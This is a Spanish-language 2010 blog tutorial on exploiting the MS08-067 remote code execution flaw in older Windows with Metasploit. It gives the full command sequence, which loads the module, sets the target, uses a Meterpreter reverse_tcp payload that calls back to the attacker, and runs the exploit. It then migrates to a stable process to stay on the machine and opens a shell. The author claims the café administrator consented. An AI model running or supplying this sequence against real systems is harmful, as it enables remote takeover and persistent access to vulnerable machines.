domingo, 14 de marzo de 2010

MetaSploit FrameWork 3.3

Hola, este tutorial, es para gente que ya tenga instalado el metasploit framework en su computadora y que sepa el manejo basico de este Soft.

primero:

¿De que se trata la vulnerabilidad MS08_067_NETAPI?

Se trata de una vulnerabilidad para la ejecución remota de código. Un atacante que aprovechara esta vulnerabilidad podría tomar el control completo de un sistema afectado de forma remota. En los sistemas basados en Microsoft Windows 2000, Windows XP y Windows Server 2003, un atacante podría aprovechar esta vulnerabilidad sobre RPC sin autenticación y ejecutar código arbitrario. Si falla el intento de aprovecharse de esta vulnerabilidad, también podría dar lugar a un bloqueo en Svchost.exe. Si se produce dicho bloqueo, afectará al servicio del servidor. El servicio del servidor proporciona compatibilidad con el uso compartido de archivos, impresoras y canalizaciones con nombre a través de la red.

La causa de esta vulnerabilidad es el servicio del servidor, que no controla correctamente las solicitudes de RPC especialmente elaboradas para ello. 





Aca dejo (en forma entera) como explotar la vulnerabilidad  y mas abajo lo detallare con fotos.


use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.103
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.105
exploit


y listo ya ingresamos


Bueno Comenzemos explotando la vulnerabilidad:




Bueno, en primera instancia, vemos la pantalla del Meta Sploit Framework 3.3 actualizado.

Aca cargamos el exploit:

use exploit/windows/smb/ms8_067_netapi
show options
set RHOST 192.168.1.103

vemos las opciones que nos pide y configuramos el pc a atacar
configuramos el host REMOTO: ip

Despues de cargar el HOST remoto, cargo el Payload .
en mi caso

set payload windows/meterpreter/reverse_tcp

lo que hago es que se conecte el host a mi , util en caso de tener un firewall bloqueando conexiones entrantes

y le digo a que maquina quiero que se conecte meterpreter

set LHOST 192.168.1.101

uso el comando exploit para empezar a explotar la vulnerabilidad

Aca esta creando la sesion meterpreter



Sesion meterpreter abierta...

Con el comando ps veo la lista de procesos

y ahora migramos a un proceso que sabemos que no se va a terminar conclusion, podemos estar en la pc el tiempo que querramos, mientras no se reinicie el PC.xD



Y ahora migramos a otro proceso el nombre a migrar del procesos

ej: migrate PID



¿se ve ?

migrate 728 que es el proceso del freeze en el ciber :D

y ahora abrire una shell i comprobare que es la Ip 192.168.1.103


Bueno, antes que nada, este tutorial fue hecho en un ciber con el consentimiento del administrador, que estubo en todo momento detras de MI :D

Tutorial By Dr [F]

No hay comentarios:

Publicar un comentario